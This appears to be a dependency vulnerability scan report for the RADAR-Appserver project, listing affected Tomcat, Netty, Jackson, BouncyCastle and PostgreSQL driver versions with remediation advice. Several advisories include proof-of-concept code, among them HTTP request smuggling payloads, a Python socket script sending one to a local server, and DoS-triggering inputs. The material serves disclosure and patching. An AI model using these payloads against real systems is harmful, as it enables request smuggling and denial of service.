Vulnerabilities |
44 via 1229 paths |
|---|---|
Dependencies |
249 |
Source |
GitHub |
Find, fix and prevent vulnerabilities in your code.
critical severity
new
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.55.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Improper Authentication when DIGEST authentication is configured. An attacker can gain unauthorized access by providing any unknown username, as the system will incorrectly authenticate the user.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.
References
high severity
new
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.FinalRemediation: Upgrade to com.google.firebase:firebase-admin@9.9.0.
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to HTTP Request Smuggling in the HttpClientCodec component. An attacker can cause response desynchronization and potentially compromise the integrity and availability of HTTP parsing by sending crafted HTTP/1.1 pipelined requests that include a HEAD request and trigger the server to send 1xx responses. This can result in unsafe reuse of the socket and misinterpretation of response bodies.
Note:
This is only exploitable if HTTP/1.1 pipelining is used, a HEAD request is present in the pipeline, and the server sends 1xx responses.
PoC
@Test
public void test() {
EmbeddedChannel channel = new EmbeddedChannel(new HttpClientCodec());
assertTrue(channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.GET, "/1")));
ByteBuf request = channel.readOutbound();
request.release();
assertNull(channel.readOutbound());
assertTrue(channel.writeOutbound(new DefaultFullHttpRequest(HttpVersion.HTTP_1_1, HttpMethod.HEAD, "/2")));
request = channel.readOutbound();
request.release();
assertNull(channel.readOutbound());
String responseStr = "HTTP/1.1 103 Early Hints\r\n\r\n" +
"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello" +
"HTTP/1.1 200 OK\r\n\r\n";
assertTrue(channel.writeInbound(Unpooled.copiedBuffer(responseStr, CharsetUtil.US_ASCII)));
// Response 1
HttpResponse response = channel.readInbound();
assertEquals(HttpResponseStatus.EARLY_HINTS, response.status());
LastHttpContent last = channel.readInbound();
assertEquals(0, last.content().readableBytes());
last.release();
// Response 2
response = channel.readInbound();
assertEquals(HttpResponseStatus.OK, response.status());
last = channel.readInbound();
assertEquals(0, last.content().readableBytes());
last.release();
// Response 3
FullHttpResponse response1 = channel.readInbound();
assertTrue(response1.decoderResult().isFailure());
assertEquals(0, response1.content().readableBytes());
response1.release();
assertFalse(channel.finish());
}
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.133.Final, 4.2.13.Final or higher.
References
high severity
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.53.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Improper Authentication in processOCSPRequest(), which is part of the the CLIENT_CERT authentication process. An attacker can trigger a soft-fail of OCSP checks when soft-fail is disabled.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.116, 10.1.53, 11.0.20 or higher.
References
high severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.19.1, com.fasterxml.jackson.core:jackson-databind@2.19.1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.21.1.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.21.1.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › io.minio:minio@8.6.0 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to io.minio:minio@9.0.1.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › io.minio:minio@8.6.0 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to io.minio:minio@9.0.1.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.radarbase:radar-auth@2.1.0 › com.auth0:java-jwt@4.4.0 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.17.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.dataformat:jackson-dataformat-yaml@2.16.2 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@2.8.17.
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in which the non-blocking async JSON parser can be made to bypass the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. An attacker can cause excessive memory allocation and CPU exhaustion by submitting JSON documents containing extremely long numeric values through the asynchronous parser interface.
PoC
The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.
package tools.jackson.core.unittest.dos;
import java.nio.charset.StandardCharsets;
import org.junit.jupiter.api.Test;
import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;
import static org.junit.jupiter.api.Assertions.*;
/**
* POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
*
* Authors: sprabhav7, rohan-repos
*
* maxNumberLength default = 1000 characters (digits).
* A number with more than 1000 digits should be rejected by any parser.
*
* BUG: The async parser never calls resetInt()/resetFloat() which is where
* validateIntegerLength()/validateFPLength() lives. Instead it calls
* _valueComplete() which skips all number length validation.
*
* CWE-770: Allocation of Resources Without Limits or Throttling
*/
class AsyncParserNumberLengthBypassTest {
private static final int MAX_NUMBER_LENGTH = 1000;
private static final int TEST_NUMBER_LENGTH = 5000;
private final JsonFactory factory = new JsonFactory();
// CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
@Test
void syncParserRejectsLongNumber() throws Exception {
byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
// Output to console
System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
try {
try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
while (p.nextToken() != null) {
if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
}
}
}
fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
} catch (StreamConstraintsException e) {
System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
}
}
// VULNERABILITY: Async parser accepts the SAME number that sync rejects
@Test
void asyncParserAcceptsLongNumber() throws Exception {
byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
NonBlockingByteArrayJsonParser p =
(NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
p.feedInput(payload, 0, payload.length);
p.endOfInput();
boolean foundNumber = false;
try {
while (p.nextToken() != null) {
if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
foundNumber = true;
String numberText = p.getText();
assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
"Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
}
}
// Output to console
System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
} catch (StreamConstraintsException e) {
fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
}
p.close();
}
private byte[] buildPayloadWithLongInteger(int numDigits) {
StringBuilder sb = new StringBuilder(numDigits + 10);
sb.append("{\"v\":");
for (int i = 0; i < numDigits; i++) {
sb.append((char) ('1' + (i % 9)));
}
sb.append('}');
return sb.toString().getBytes(StandardCharsets.UTF_8);
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.6, 2.21.1 or higher.
References
high severity
- Vulnerable module: com.fasterxml.jackson.core:jackson-core
- Introduced through: com.fasterxml.jackson.core:jackson-core@2.19.1, com.fasterxml.jackson.core:jackson-databind@2.19.1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-core@2.21.2.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to com.fasterxml.jackson.core:jackson-databind@2.21.2.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › io.minio:minio@8.6.0 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to io.minio:minio@9.0.1.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › io.minio:minio@8.6.0 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1Remediation: Upgrade to io.minio:minio@9.0.1.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.radarbase:radar-auth@2.1.0 › com.auth0:java-jwt@4.4.0 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › io.swagger.core.v3:swagger-core-jakarta@2.2.25 › com.fasterxml.jackson.dataformat:jackson-dataformat-yaml@2.16.2 › com.fasterxml.jackson.core:jackson-databind@2.19.1 › com.fasterxml.jackson.core:jackson-core@2.19.1
Overview
com.fasterxml.jackson.core:jackson-core is a Core Jackson abstractions, basic JSON streaming API implementation
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the enforcement of document length constraints in blocking, async, and DataInput parser processes. An attacker can cause excessive resource consumption by submitting oversized JSON documents that bypass configured size limits.
Remediation
Upgrade com.fasterxml.jackson.core:jackson-core to version 2.18.7, 2.21.2 or higher.
References
high severity
new
- Vulnerable module: io.netty:netty-codec-compression
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.Final › io.netty:netty-codec-compression@4.2.10.FinalRemediation: Upgrade to com.google.firebase:firebase-admin@9.9.0.
Overview
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the Lz4FrameDecoder component. An attacker can cause excessive memory allocation by sending specially crafted compressed data with manipulated header fields, leading to resource exhaustion and potential denial of service.
PoC
@Test
void test() throws Exception {
EventLoopGroup workerGroup = new MultiThreadIoEventLoopGroup(NioIoHandler.newFactory());
try {
AtomicReference<Throwable> serverError = new AtomicReference<>();
CountDownLatch latch = new CountDownLatch(1);
ServerBootstrap server = new ServerBootstrap()
.group(workerGroup)
.channel(NioServerSocketChannel.class)
.childHandler(new ChannelInitializer<SocketChannel>() {
@Override
protected void initChannel(SocketChannel ch) {
ch.pipeline()
.addLast(new Lz4FrameDecoder())
.addLast(new ChannelInboundHandlerAdapter() {
@Override
public void exceptionCaught(ChannelHandlerContext ctx, Throwable cause) {
if (cause instanceof DecoderException) {
serverError.set(cause.getCause());
} else {
serverError.set(cause);
}
latch.countDown();
}
});
}
});
ChannelFuture serverChannel = server.bind(0).sync();
Bootstrap client = new Bootstrap()
.group(workerGroup)
.channel(NioSocketChannel.class)
.handler(new ChannelInboundHandlerAdapter() {
@Override
public void channelActive(ChannelHandlerContext ctx) {
ByteBuf buf = ctx.alloc().buffer(22, 22);
buf.writeLong(MAGIC_NUMBER);
buf.writeByte(BLOCK_TYPE_COMPRESSED | 0x0F);
buf.writeIntLE(1);
buf.writeIntLE(1 << 25);
buf.writeIntLE(0);
buf.writeByte(0);
ctx.writeAndFlush(buf);
ctx.fireChannelActive();
}
});
ChannelFuture clientChannel = client.connect(serverChannel.channel().localAddress()).sync();
assertTrue(latch.await(10, TimeUnit.SECONDS));
assertInstanceOf(IndexOutOfBoundsException.class, serverError.get());
clientChannel.channel().close();
serverChannel.channel().close();
} finally {
workerGroup.shutdownGracefully();
}
}
Remediation
Upgrade io.netty:netty-codec-compression to version 4.2.13.Final or higher.
References
high severity
new
- Vulnerable module: io.netty:netty-codec-compression
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.Final › io.netty:netty-codec-compression@4.2.10.FinalRemediation: Upgrade to com.google.firebase:firebase-admin@9.9.0.
Overview
Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) in the HttpContentDecompressor and DelegatingDecompressorFrameListener components when the Content-Encoding header is set to br, zstd, or snappy. An attacker can exhaust system memory and cause a denial of service by sending a highly compressed payload that decompresses to a very large size, bypassing the configured decompression limit.
Remediation
Upgrade io.netty:netty-codec-compression to version 4.2.13.Final or higher.
References
high severity
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.FinalRemediation: Upgrade to com.google.firebase:firebase-admin@9.9.0.
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to HTTP Request Smuggling in the parsing of quoted strings within chunked transfer encoding extension values. An attacker can inject arbitrary HTTP requests into a connection by crafting chunk extensions containing carriage return or line feed bytes, leading to parsing discrepancies between the server and RFC-compliant intermediaries.
PoC
#!/usr/bin/env python3
import socket
payload = (
b"POST / HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Transfer-Encoding: chunked\r\n"
b"\r\n"
b'1;a="\r\n'
b"X\r\n"
b"0\r\n"
b"\r\n"
b"GET /smuggled HTTP/1.1\r\n"
b"Host: localhost\r\n"
b"Content-Length: 11\r\n"
b"\r\n"
b'"\r\n'
b"Y\r\n"
b"0\r\n"
b"\r\n"
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect(("127.0.0.1", 8080))
sock.sendall(payload)
response = b""
while True:
try:
chunk = sock.recv(4096)
if not chunk:
break
response += chunk
except socket.timeout:
break
sock.close()
print(f"Responses: {response.count(b'HTTP/')}")
print(response.decode(errors="replace"))
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.132.Final, 4.2.12.Final or higher.
References
high severity
new
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › io.netty:netty-codec-http@4.2.10.FinalRemediation: Upgrade to com.google.firebase:firebase-admin@9.9.0.
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to HTTP Request Smuggling when parsed HTTP requests contain malformed Transfer-Encoding headers. An attacker can inject unauthorized HTTP requests by crafting a request with a Transfer-Encoding: chunked, identity header, which is incorrectly interpreted, allowing the attacker to smuggle additional requests through the connection.
PoC
@Test
public void test() {
String requestStr = "POST / HTTP/1.1\r\n" +
"Host: localhost\r\n" +
"Transfer-Encoding: chunked, identity\r\n" +
"Content-Length: 48\r\n" +
"\r\n" +
"0\r\n" +
"\r\n" +
"GET /smuggled HTTP/1.1\r\n" +
"Host: localhost\r\n" +
"\r\n";
EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));
// Request 1
HttpRequest request = channel.readInbound();
assertTrue(request.decoderResult().isSuccess());
assertTrue(request.headers().contains("Transfer-Encoding"));
assertFalse(request.headers().contains("Content-Length"));
LastHttpContent last = channel.readInbound();
assertTrue(last.decoderResult().isSuccess());
last.release();
// Request 2
request = channel.readInbound();
assertTrue(request.decoderResult().isSuccess());
last = channel.readInbound();
assertTrue(last.decoderResult().isSuccess());
last.release();
}
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.133.Final, 4.2.13.Final or higher.
References
high severity
- Vulnerable module: org.apache.httpcomponents.core5:httpcore5-h2
- Introduced through: com.google.firebase:firebase-admin@9.8.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › com.google.firebase:firebase-admin@9.8.0 › org.apache.httpcomponents.client5:httpclient5@5.3.1 › org.apache.httpcomponents.core5:httpcore5-h2@5.2.4
Overview
Affected versions of this package are vulnerable to Denial of Service (DoS) due to incorrect stream accounting in the handling of server-sent stream resets. An attacker can cause excessive server resource consumption by rapidly opening streams and triggering resets using malformed frames or flow control errors, resulting in the server processing an unbounded number of concurrent streams on a single connection.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.apache.httpcomponents.core5:httpcore5-h2 to version 5.3.5 or higher.
References
high severity
new
- Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
- Introduced through: org.apache.tomcat.embed:tomcat-embed-core@10.1.52 and org.springframework.boot:spring-boot-starter-web@4.1.0-RC1
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.apache.tomcat.embed:tomcat-embed-core@10.1.52Remediation: Upgrade to org.apache.tomcat.embed:tomcat-embed-core@10.1.55.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-websocket@11.0.21 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-RC1 › org.springframework.boot:spring-boot-tomcat@4.1.0-RC1 › org.apache.tomcat.embed:tomcat-embed-core@10.1.52
Overview
org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the WebDAV LOCK and PROPFIND XML request bodies. An attacker can cause excessive resource consumption by sending specially crafted requests that trigger unbounded reads.
Remediation
Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 9.0.118, 10.1.55, 11.0.22 or higher.
References
high severity
- Vulnerable module: org.bouncycastle:bcprov-jdk18on
- Introduced through: io.minio:minio@8.6.0
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › io.minio:minio@8.6.0 › org.bouncycastle:bcprov-jdk18on@1.81Remediation: Upgrade to io.minio:minio@9.0.1.
Overview
Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm due to the generateCTR process in G3413CTRBlockCipher. An attacker can recover relationships between encrypted plaintext blocks by driving the cipher past its counter range and causing the counter to wrap, which makes the stream repeat and produces identical ciphertext for different blocks. This breaks the confidentiality of data protected with G3413CTRBlockCipher and can expose plaintext patterns or allow plaintext recovery when the same key and IV are reused across enough blocks.
Remediation
Upgrade org.bouncycastle:bcprov-jdk18on to version 1.84 or higher.
References
high severity
- Vulnerable module: org.postgresql:postgresql
- Introduced through: org.postgresql:postgresql@42.5.5
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.postgresql:postgresql@42.5.5Remediation: Upgrade to org.postgresql:postgresql@42.7.11.
Overview
org.postgresql:postgresql is a Java JDBC 4.2 (JRE 8+) driver for PostgreSQL database.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling during the client-side SCRAM-SHA-256 authentication. An attacker can cause excessive CPU consumption by specifying a very large PBKDF2 iteration count during authentication attempts from a malicious server. This can lead to exhaustion of client CPU resources and disruption of connection pools.
Workaround
The following measures can reduce exposure:
Only connect to trusted PostgreSQL servers whose identity is verified. Connect only to trusted PostgreSQL servers, and verify server identity with TLS using
sslmode=verify-fulland a trusted CA. TLS without certificate and hostname verification is not sufficient as an active network attacker can still impersonate the server.Do not rely on
loginTimeoutas a complete mitigation on unpatched versions. On affected versions,loginTimeoutcan stop the waiting caller while the worker thread continues spending CPU.Avoid SCRAM on untrusted or interceptable connection paths. For those paths, use an authentication method that does not let the server choose a SCRAM PBKDF2 iteration count.
Reduce blast radius operationally. Limit parallel connection attempts, add retry backoff, isolate connection establishment in a separate worker or process when possible, and apply CPU or container limits where appropriate.
On trusted servers you control, keep SCRAM iteration counts at ordinary values. This does not defend against an attacker-controlled server, but it avoids unnecessary client cost when talking to legitimate servers.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.
Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.
One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.
When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.
Two common types of DoS vulnerabilities:
High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
